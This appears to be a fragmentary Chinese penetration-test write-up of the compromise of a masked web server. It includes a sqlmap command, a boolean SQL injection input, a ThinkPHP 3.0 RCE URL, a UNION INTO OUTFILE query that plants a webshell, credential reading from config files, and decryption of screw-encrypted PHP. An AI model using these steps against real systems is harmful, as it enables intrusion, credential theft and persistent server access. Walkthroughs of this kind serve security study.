mysql
,ftp
,ssh
,http
,ajp
,tomcat
多个服务2020-10487 Tomcat apj
WEB-INF/web.xml
里没有任何东西name
进行注入, 输入"||1||"
返回正常数据 ,但无法注释后面的内容,只能布尔注入
python .\sqlmap.py -r res --tamper=space2comment --level 5 --dbs --random-agent
nginx
和 web目录
,默认路径不存在***/nginx/conf/nignx.conf
location /** {
autoindex on;
root /***/***/******;
index index.html index.htm index.php;
if (!-e $request_filename) {
rewrite ^/xx/(.*)$ /xxxx/admin.php/$1 last;break;
}
}location = /xxx {
#autoindex on;
root /xxx/xxx/xxxx;
index index.html index.htm index.php;
if (!-e $request_filename) {
rewrite ^/xx /xx/index.php last;
break;
}
}
mysql.inc.php
,读取获取了 mysql 的账号密码tp3.0
的远古框架 ,根据框架读了一下配置文件(也就是入可文件index.php)├─caches
│ ├─cache
│ ├─data
│ ├─logs
│ └─temp
├─common
├─Conf
├─language
├─library
│ ├─Action
│ ├─****
│ ├─Model
│ └─****
└─themes
tp3
的编程风格,确定 项目的文件为IndexAction.class.php
,通过sql注入读取发现乱码。。。tp3.0
的RCEhttp://**/index.php/Index/index/name/$%[email protected]%28%29%7D
define('MODE_NAME','Lite');
0 union select tohex('webshell'),1,2 into outfile '/**/**/**/shell.php'
PM9SCREW
检索了一下 是screw
加密php_screw.so
文件IDA
_pm9screw_ext_fopen
加密函数key
(打码部分https://github.com/firebroo/screw_decode
进行解密screwdecode.c
make
./decode ./xx.php
学习更多技术,关注我: